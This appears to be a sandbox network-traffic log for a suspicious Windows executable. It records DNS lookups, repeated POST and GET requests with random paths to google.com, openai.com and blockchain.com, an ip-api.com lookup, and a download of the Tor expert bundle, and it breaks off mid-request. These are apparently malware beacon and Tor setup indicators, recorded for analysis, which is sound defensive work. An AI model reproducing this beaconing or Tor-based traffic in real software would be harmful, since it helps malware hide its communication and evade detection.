      Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' 'unsafe-eval' 'sha256-Fu6BQZHI9lIev81cMzan2gbFLQJijUWL2tHnvhvYP1k=' 'sha256-B9HPo9/jX4atLVuuhcrzSKwMHW+UCXph8cK5JNCTkZM=' https://api.observablehq.com https://cdn.jsdelivr.net https://cdn.openai.com https://unpkg.com https://www.googletagmanager.com https://static.cloudflareinsights.com; style-src 'self' 'unsafe-inline' https://www.gstatic.com https://fonts.googleapis.com https://github.githubassets.com; img-src 'self' data: https: https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://i.vimeocdn.com https://images.openai.com; font-src 'self' data: https://use.typekit.net https://cdn.jsdelivr.net https://fonts.gstatic.com; connect-src 'self' *.google-analytics.com https://region1.google-analytics.com https://cdnmd.global-cache.online https://translate.googleapis.com https://cloudflareinsights.com https://cdn.jsdelivr.net https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://gist.githubusercontent.com https://o33249.ingest.sentry.io https://openaicom-api-bdcpf8c6d2e9atf6.z01.azurefd.net https://static.observableusercontent.com https://www.google-analytics.com; media-src 'self' data: https://translate.google.com https://cdn.openai.com https://openaicomproductionae4b.blob.core.windows.net; object-src 'none'; frame-src 'self' https://vimeo.com https://openaipublic.blob.core.windows.net https://platform.twitter.com https://www.instagram.com https://m.youtube.com https://player.twitch.tv https://player.vimeo.com https://w.soundcloud.com; base-uri 'self'; manifest-src 'self'; report-uri https://oaic.report-uri.com/r/d/csp/reportOnly
      x-azure-ref: 20240410T022916Z-17585d9fd9cj44z6bkvt57bsaw000000066g000000009mfz
      x-fd-int-roxy-purgeid: 43958466
      X-Cache: TCP_MISS
    • flag-gb
      POST
      http://google.com/dIoqxQcxKt?q=2
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      142.250.200.14:80
      Request
      POST /dIoqxQcxKt?q=2 HTTP/1.1
      Host: google.com
      Content-Length: 91
      Expect: 100-continue
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=UTF-8
      Referrer-Policy: no-referrer
      Content-Length: 1571
      Date: Wed, 10 Apr 2024 02:29:15 GMT
      Connection: close
    • flag-gb
      POST
      http://google.com/dIoqxQcxKt?q=2
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      142.250.200.14:80
      Request
      POST /dIoqxQcxKt?q=2 HTTP/1.1
      Host: google.com
      Content-Length: 91
      Expect: 100-continue
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=UTF-8
      Referrer-Policy: no-referrer
      Content-Length: 1571
      Date: Wed, 10 Apr 2024 02:29:15 GMT
      Connection: close
    • flag-us
      GET
      https://www.blockchain.com/SrTg2TH7BH?q=4
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      104.16.30.98:443
      Request
      GET /SrTg2TH7BH?q=4 HTTP/1.1
      Host: www.blockchain.com
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:29:15 GMT
      Content-Type: text/html; charset=utf-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      content-security-policy: default-src *.blockchain.com; script-src 'self' 'unsafe-eval' https://cdn.polyfill.io https://www.facebook.com http://www.google-analytics.com https://www.google.com https://www.gstatic.com *.blockchain.com *.blockchain.info https://www.googletagmanager.com nonce-KKQU17n4ciggl09H4z5jfIeMMetmeTZ8 data:; script-src-elem 'self' 'unsafe-inline' https://cdn.polyfill.io http://www.google-analytics.com https://www.googletagmanager.com https://analytics.twitter.com http://static.ads-twitter.com https://connect.facebook.net nonce-KKQU17n4ciggl09H4z5jfIeMMetmeTZ8; connect-src 'self' *.blockchain.com *.blockchain.info *.cryptocompare.com https://script.google.com https://webto.salesforce.com/* wss://streamer.cryptocompare.com https://blockchain.info https://api.greenhouse.io *.doubleclick.net *.google.com *.googleusercontent.com https://www.google-analytics.com https://cdn.embedly.com nonce-KKQU17n4ciggl09H4z5jfIeMMetmeTZ8; frame-src 'self' *.blockchain.com *.blockchain.info *.apple.com https://www.google.com https://www.youtube.com https://www.googletagmanager.com https://cdn.embedly.com https://dxmfp9dfv1uwi.cloudfront.net/; img-src 'self' *.blockchain.com *.blockchain.info *.medium.com https://www.googletagmanager.com *.adsrvr.org data: *.cryptocompare.com *.googleusercontent.com https://www.facebook.com http://www.google-analytics.com https://www.google.com http://t.co/i/adsct https://raw.githubusercontent.com *.medium.com; style-src 'self' 'unsafe-inline' https://rsms.me https://fonts.googleapis.com nonce-KKQU17n4ciggl09H4z5jfIeMMetmeTZ8; font-src 'self' https://rsms.me https://fonts.gstatic.com data:; manifest-src 'self'; object-src 'self'; media-src 'self' *.archive.org;
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      vary: Accept-Encoding
      x-blockchain-cp-b: blockchain-com
      x-blockchain-cp-f: bm9b 0.001 - 21f4dc4d1d8c733fd82cb011edf6380a
      x-blockchain-language: en
      x-blockchain-language-id: 0:0:0 (en:en:en)
      x-blockchain-server: BlockchainFE/1.0
      x-content-type-options: nosniff
      x-frame-options: SAMEORIGIN
      x-original-host: www.blockchain.com
      x-request-id: 21f4dc4d1d8c733fd82cb011edf6380a
      x-xss-protection: 1; mode=block
      CF-Cache-Status: HIT
      Age: 12
      Set-Cookie: _cfuvid=fAQmeSp4t4vmuPsg2zG4XPCELeYhzM_xKeQt0bt4Pu8-1712716155945-0.0.1.1-604800000; path=/; domain=.blockchain.com; HttpOnly; Secure; SameSite=None
      Server: cloudflare
      CF-RAY: 871f4ee698349490-LHR
    • flag-us
      GET
      http://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:29:16 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/MWPpdfCd2G?q=114
      x-azure-ref: 20240410T022916Z-17585d9fd9cjn5v4s1xh6dd7ps00000002eg00000000cdvs
      X-Cache: CONFIG_NOCACHE
    • flag-gb
      POST
      http://google.com/dIoqxQcxKt?q=2
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      142.250.200.14:80
      Request
      POST /dIoqxQcxKt?q=2 HTTP/1.1
      Host: google.com
      Content-Length: 91
      Expect: 100-continue
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=UTF-8
      Referrer-Policy: no-referrer
      Content-Length: 1571
      Date: Wed, 10 Apr 2024 02:29:16 GMT
      Connection: close
    • flag-gb
      POST
      http://google.com/dIoqxQcxKt?q=2
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      142.250.200.14:80
      Request
      POST /dIoqxQcxKt?q=2 HTTP/1.1
      Host: google.com
      Content-Length: 91
      Expect: 100-continue
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=UTF-8
      Referrer-Policy: no-referrer
      Content-Length: 1571
      Date: Wed, 10 Apr 2024 02:29:16 GMT
      Connection: close
    • flag-gb
      POST
      http://google.com/dIoqxQcxKt?q=2
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      142.250.200.14:80
      Request
      POST /dIoqxQcxKt?q=2 HTTP/1.1
      Host: google.com
      Content-Length: 91
      Expect: 100-continue
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=UTF-8
      Referrer-Policy: no-referrer
      Content-Length: 1571
      Date: Wed, 10 Apr 2024 02:29:16 GMT
      Connection: close
    • flag-gb
      POST
      http://google.com/dIoqxQcxKt?q=2
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      142.250.200.14:80
      Request
      POST /dIoqxQcxKt?q=2 HTTP/1.1
      Host: google.com
      Content-Length: 91
      Expect: 100-continue
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=UTF-8
      Referrer-Policy: no-referrer
      Content-Length: 1571
      Date: Wed, 10 Apr 2024 02:29:16 GMT
      Connection: close
    • flag-us
      DNS
      226.63.69.159.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      226.63.69.159.in-addr.arpa
      IN PTR
      Response
      226.63.69.159.in-addr.arpa
      IN PTR
      archive-01 torprojectorg
    • flag-us
      DNS
      226.63.69.159.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      226.63.69.159.in-addr.arpa
      IN PTR
    • flag-us
      DNS
      98.29.16.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      98.29.16.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      98.29.16.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      98.29.16.104.in-addr.arpa
      IN PTR
    • flag-us
      DNS
      47.166.228.91.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      47.166.228.91.in-addr.arpa
      IN PTR
      Response
      47.166.228.91.in-addr.arpa
      IN PTR
      skh1-webredir01-v.eset.com
    • flag-us
      DNS
      47.166.228.91.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      47.166.228.91.in-addr.arpa
      IN PTR
    • flag-us
      DNS
      98.30.16.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      98.30.16.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      98.30.16.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      98.30.16.104.in-addr.arpa
      IN PTR
    • flag-us
      DNS
      121.77.117.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      121.77.117.104.in-addr.arpa
      IN PTR
      Response
      121.77.117.104.in-addr.arpa
      IN PTR
      a104-117-77-121.deploy.static.akamaitechnologies.com
    • flag-us
      DNS
      121.77.117.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      121.77.117.104.in-addr.arpa
      IN PTR
    • flag-us
      DNS
      14.200.250.142.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      14.200.250.142.in-addr.arpa
      IN PTR
      Response
      14.200.250.142.in-addr.arpa
      IN PTR
      lhr48s29-in-f14.1e100.net
    • flag-us
      DNS
      14.200.250.142.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      14.200.250.142.in-addr.arpa
      IN PTR
    • flag-us
      DNS
      ip-api.com
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      8.8.8.8:53
      Request
      ip-api.com
      IN A
      Response
      ip-api.com
      IN A
      208.95.112.1
    • flag-us
      DNS
      ip-api.com
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      8.8.8.8:53
      Request
      ip-api.com
      IN A
    • flag-us
      DNS
      25.251.17.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      25.251.17.2.in-addr.arpa
      IN PTR
      Response
      25.251.17.2.in-addr.arpa
      IN PTR
      a2-17-251-25.deploy.static.akamaitechnologies.com
    • flag-de
      GET
      https://archive.torproject.org/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      159.69.63.226:443
      Request
      GET /tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz HTTP/1.1
      Host: archive.torproject.org
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Server: Apache
      X-Content-Type-Options: nosniff
      X-Frame-Options: sameorigin
      X-Xss-Protection: 1
      Referrer-Policy: no-referrer
      Strict-Transport-Security: max-age=15768000; preload
      Onion-Location: http://uy3qxvwzwoeztnellvvhxh7ju7kfvlsauka7avilcjg7domzxptbq7qd.onion/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz
      Last-Modified: Thu, 16 Mar 2023 15:33:36 GMT
      ETag: "d42801-5f7062f2cbbbf"
      Accept-Ranges: bytes
      Content-Length: 13903873
      Cache-Control: max-age=2592000
      Expires: Fri, 10 May 2024 02:30:02 GMT
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: application/x-gzip
      Content-Language: en
    • flag-us
      DNS
      openai.com
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      8.8.8.8:53
      Request
      openai.com
      IN A
      Response
      openai.com
      IN A
      13.107.246.64
      openai.com
      IN A
      13.107.213.64
    • flag-us
      DNS
      blockchain.com
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      8.8.8.8:53
      Request
      blockchain.com
      IN A
      Response
      blockchain.com
      IN A
      104.16.30.98
      blockchain.com
      IN A
      104.16.29.98
    • flag-us
      POST
      http://openai.com/ifMwwwu7Vx?q=1
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      POST /ifMwwwu7Vx?q=1 HTTP/1.1
      Host: openai.com
      Content-Length: 206
      Expect: 100-continue
      Connection: Keep-Alive
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/ifMwwwu7Vx?q=1
      x-azure-ref: 20240410T023002Z-17585d9fd9cj44z6bkvt57bsaw0000000690000000004czu
      X-Cache: CONFIG_NOCACHE
    • flag-us
      GET
      http://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/MWPpdfCd2G?q=114
      x-azure-ref: 20240410T023002Z-17585d9fd9cj44z6bkvt57bsaw0000000690000000004d05
      X-Cache: CONFIG_NOCACHE
    • flag-us
      GET
      http://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/MWPpdfCd2G?q=114
      x-azure-ref: 20240410T023002Z-17585d9fd9cj44z6bkvt57bsaw0000000690000000004d08
      X-Cache: CONFIG_NOCACHE
    • flag-us
      GET
      http://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/MWPpdfCd2G?q=114
      x-azure-ref: 20240410T023002Z-17585d9fd9cj44z6bkvt57bsaw0000000690000000004d0a
      X-Cache: CONFIG_NOCACHE
    • flag-us
      GET
      http://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/MWPpdfCd2G?q=114
      x-azure-ref: 20240410T023002Z-17585d9fd9cj44z6bkvt57bsaw0000000690000000004d0k
      X-Cache: CONFIG_NOCACHE
    • flag-us
      GET
      http://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/MWPpdfCd2G?q=114
      x-azure-ref: 20240410T023002Z-17585d9fd9cj44z6bkvt57bsaw0000000690000000004d0t
      X-Cache: CONFIG_NOCACHE
    • flag-us
      GET
      http://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/MWPpdfCd2G?q=114
      x-azure-ref: 20240410T023003Z-17585d9fd9cj44z6bkvt57bsaw0000000690000000004d12
      X-Cache: CONFIG_NOCACHE
    • flag-us
      GET
      http://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/MWPpdfCd2G?q=114
      x-azure-ref: 20240410T023003Z-17585d9fd9cj44z6bkvt57bsaw0000000690000000004d15
      X-Cache: CONFIG_NOCACHE
    • flag-us
      GET
      http://blockchain.com/ARmyOO9vJh?q=133
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      104.16.30.98:80
      Request
      GET /ARmyOO9vJh?q=133 HTTP/1.1
      Host: blockchain.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 301 Moved Permanently
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Transfer-Encoding: chunked
      Connection: keep-alive
      Cache-Control: max-age=3600
      Expires: Wed, 10 Apr 2024 03:30:02 GMT
      Location: https://www.blockchain.com/ARmyOO9vJh?q=133
      X-Content-Type-Options: nosniff
      Set-Cookie: _cfuvid=LtqTMBtVM1qmjPIh7vIibQJ9cJyzW079L78YICk8laE-1712716202315-0.0.1.1-604800000; path=/; domain=.blockchain.com; HttpOnly
      Server: cloudflare
      CF-RAY: 871f50084f2f640c-LHR
    • flag-us
      GET
      https://www.blockchain.com/ARmyOO9vJh?q=133
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      104.16.30.98:443
      Request
      GET /ARmyOO9vJh?q=133 HTTP/1.1
      Host: www.blockchain.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Content-Type: text/html; charset=utf-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      content-security-policy: default-src *.blockchain.com; script-src 'self' 'unsafe-eval' https://cdn.polyfill.io https://www.facebook.com http://www.google-analytics.com https://www.google.com https://www.gstatic.com *.blockchain.com *.blockchain.info https://www.googletagmanager.com nonce-wF8xZix9kiBdsEWDv6lechyHIi5hBIeY data:; script-src-elem 'self' 'unsafe-inline' https://cdn.polyfill.io http://www.google-analytics.com https://www.googletagmanager.com https://analytics.twitter.com http://static.ads-twitter.com https://connect.facebook.net nonce-wF8xZix9kiBdsEWDv6lechyHIi5hBIeY; connect-src 'self' *.blockchain.com *.blockchain.info *.cryptocompare.com https://script.google.com https://webto.salesforce.com/* wss://streamer.cryptocompare.com https://blockchain.info https://api.greenhouse.io *.doubleclick.net *.google.com *.googleusercontent.com https://www.google-analytics.com https://cdn.embedly.com nonce-wF8xZix9kiBdsEWDv6lechyHIi5hBIeY; frame-src 'self' *.blockchain.com *.blockchain.info *.apple.com https://www.google.com https://www.youtube.com https://www.googletagmanager.com https://cdn.embedly.com https://dxmfp9dfv1uwi.cloudfront.net/; img-src 'self' *.blockchain.com *.blockchain.info *.medium.com https://www.googletagmanager.com *.adsrvr.org data: *.cryptocompare.com *.googleusercontent.com https://www.facebook.com http://www.google-analytics.com https://www.google.com http://t.co/i/adsct https://raw.githubusercontent.com *.medium.com; style-src 'self' 'unsafe-inline' https://rsms.me https://fonts.googleapis.com nonce-wF8xZix9kiBdsEWDv6lechyHIi5hBIeY; font-src 'self' https://rsms.me https://fonts.gstatic.com data:; manifest-src 'self'; object-src 'self'; media-src 'self' *.archive.org;
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      vary: Accept-Encoding
      x-blockchain-cp-b: blockchain-com
      x-blockchain-cp-f: 273f 0.002 - 054465ea7ef23ca42b86595430f4cbe5
      x-blockchain-language: en
      x-blockchain-language-id: 0:0:0 (en:en:en)
      x-blockchain-server: BlockchainFE/1.0
      x-content-type-options: nosniff
      x-frame-options: SAMEORIGIN
      x-original-host: www.blockchain.com
      x-request-id: 054465ea7ef23ca42b86595430f4cbe5
      x-xss-protection: 1; mode=block
      CF-Cache-Status: HIT
      Age: 39
      Set-Cookie: _cfuvid=r9nlFMofdLZW_VcGUNmw2U7QSgr7biSnuqN3sBPA1GE-1712716202868-0.0.1.1-604800000; path=/; domain=.blockchain.com; HttpOnly; Secure; SameSite=None
      Server: cloudflare
      CF-RAY: 871f500bcf5d7302-LHR
    • flag-us
      POST
      https://openai.com/ifMwwwu7Vx?q=1
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      POST /ifMwwwu7Vx?q=1 HTTP/1.1
      Host: openai.com
      Content-Length: 206
      Expect: 100-continue
      Connection: Keep-Alive
      Response
      HTTP/1.1 405 Method Not Allowed
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Content-Length: 0
      Connection: keep-alive
      Allow: GET, HEAD, OPTIONS
      x-azure-ref: 20240410T023002Z-174cb64fdd75m6xxh6yn3vv8ys000000021g0000000037fw
      X-Cache: TCP_MISS
      cache-control: no-cache
    • flag-us
      GET
      https://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Content-Type: text/html
      Content-Length: 2028
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Content-Range: bytes 0-2027/2028
      ETag: "41035449"
      Last-Modified: Wed, 10 Apr 2024 00:12:52 GMT
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Referrer-Policy: same-origin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
      Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' 'unsafe-eval' 'sha256-Fu6BQZHI9lIev81cMzan2gbFLQJijUWL2tHnvhvYP1k=' 'sha256-B9HPo9/jX4atLVuuhcrzSKwMHW+UCXph8cK5JNCTkZM=' https://api.observablehq.com https://cdn.jsdelivr.net https://cdn.openai.com https://unpkg.com https://www.googletagmanager.com https://static.cloudflareinsights.com; style-src 'self' 'unsafe-inline' https://www.gstatic.com https://fonts.googleapis.com https://github.githubassets.com; img-src 'self' data: https: https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://i.vimeocdn.com https://images.openai.com; font-src 'self' data: https://use.typekit.net https://cdn.jsdelivr.net https://fonts.gstatic.com; connect-src 'self' *.google-analytics.com https://region1.google-analytics.com https://cdnmd.global-cache.online https://translate.googleapis.com https://cloudflareinsights.com https://cdn.jsdelivr.net https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://gist.githubusercontent.com https://o33249.ingest.sentry.io https://openaicom-api-bdcpf8c6d2e9atf6.z01.azurefd.net https://static.observableusercontent.com https://www.google-analytics.com; media-src 'self' data: https://translate.google.com https://cdn.openai.com https://openaicomproductionae4b.blob.core.windows.net; object-src 'none'; frame-src 'self' https://vimeo.com https://openaipublic.blob.core.windows.net https://platform.twitter.com https://www.instagram.com https://m.youtube.com https://player.twitch.tv https://player.vimeo.com https://w.soundcloud.com; base-uri 'self'; manifest-src 'self'; report-uri https://oaic.report-uri.com/r/d/csp/reportOnly
      x-azure-ref: 20240410T023002Z-174cb64fdd75m6xxh6yn3vv8ys000000021g0000000037fy
      x-fd-int-roxy-purgeid: 43958466
      X-Cache: TCP_MISS
    • flag-us
      GET
      https://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Content-Type: text/html
      Content-Length: 2028
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Content-Range: bytes 0-2027/2028
      ETag: "41035449"
      Last-Modified: Wed, 10 Apr 2024 00:12:52 GMT
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Referrer-Policy: same-origin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
      Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' 'unsafe-eval' 'sha256-Fu6BQZHI9lIev81cMzan2gbFLQJijUWL2tHnvhvYP1k=' 'sha256-B9HPo9/jX4atLVuuhcrzSKwMHW+UCXph8cK5JNCTkZM=' https://api.observablehq.com https://cdn.jsdelivr.net https://cdn.openai.com https://unpkg.com https://www.googletagmanager.com https://static.cloudflareinsights.com; style-src 'self' 'unsafe-inline' https://www.gstatic.com https://fonts.googleapis.com https://github.githubassets.com; img-src 'self' data: https: https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://i.vimeocdn.com https://images.openai.com; font-src 'self' data: https://use.typekit.net https://cdn.jsdelivr.net https://fonts.gstatic.com; connect-src 'self' *.google-analytics.com https://region1.google-analytics.com https://cdnmd.global-cache.online https://translate.googleapis.com https://cloudflareinsights.com https://cdn.jsdelivr.net https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://gist.githubusercontent.com https://o33249.ingest.sentry.io https://openaicom-api-bdcpf8c6d2e9atf6.z01.azurefd.net https://static.observableusercontent.com https://www.google-analytics.com; media-src 'self' data: https://translate.google.com https://cdn.openai.com https://openaicomproductionae4b.blob.core.windows.net; object-src 'none'; frame-src 'self' https://vimeo.com https://openaipublic.blob.core.windows.net https://platform.twitter.com https://www.instagram.com https://m.youtube.com https://player.twitch.tv https://player.vimeo.com https://w.soundcloud.com; base-uri 'self'; manifest-src 'self'; report-uri https://oaic.report-uri.com/r/d/csp/reportOnly
      x-azure-ref: 20240410T023003Z-174cb64fdd75m6xxh6yn3vv8ys000000021g0000000037fz
      x-fd-int-roxy-purgeid: 43958466
      X-Cache: TCP_MISS
    • flag-us
      GET
      https://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Content-Type: text/html
      Content-Length: 2028
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Content-Range: bytes 0-2027/2028
      ETag: "41035449"
      Last-Modified: Wed, 10 Apr 2024 00:12:52 GMT
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Referrer-Policy: same-origin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
      Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' 'unsafe-eval' 'sha256-Fu6BQZHI9lIev81cMzan2gbFLQJijUWL2tHnvhvYP1k=' 'sha256-B9HPo9/jX4atLVuuhcrzSKwMHW+UCXph8cK5JNCTkZM=' https://api.observablehq.com https://cdn.jsdelivr.net https://cdn.openai.com https://unpkg.com https://www.googletagmanager.com https://static.cloudflareinsights.com; style-src 'self' 'unsafe-inline' https://www.gstatic.com https://fonts.googleapis.com https://github.githubassets.com; img-src 'self' data: https: https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://i.vimeocdn.com https://images.openai.com; font-src 'self' data: https://use.typekit.net https://cdn.jsdelivr.net https://fonts.gstatic.com; connect-src 'self' *.google-analytics.com https://region1.google-analytics.com https://cdnmd.global-cache.online https://translate.googleapis.com https://cloudflareinsights.com https://cdn.jsdelivr.net https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://gist.githubusercontent.com https://o33249.ingest.sentry.io https://openaicom-api-bdcpf8c6d2e9atf6.z01.azurefd.net https://static.observableusercontent.com https://www.google-analytics.com; media-src 'self' data: https://translate.google.com https://cdn.openai.com https://openaicomproductionae4b.blob.core.windows.net; object-src 'none'; frame-src 'self' https://vimeo.com https://openaipublic.blob.core.windows.net https://platform.twitter.com https://www.instagram.com https://m.youtube.com https://player.twitch.tv https://player.vimeo.com https://w.soundcloud.com; base-uri 'self'; manifest-src 'self'; report-uri https://oaic.report-uri.com/r/d/csp/reportOnly
      x-azure-ref: 20240410T023003Z-174cb64fdd75m6xxh6yn3vv8ys000000021g0000000037g0
      x-fd-int-roxy-purgeid: 43958466
      X-Cache: TCP_MISS
    • flag-us
      GET
      https://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
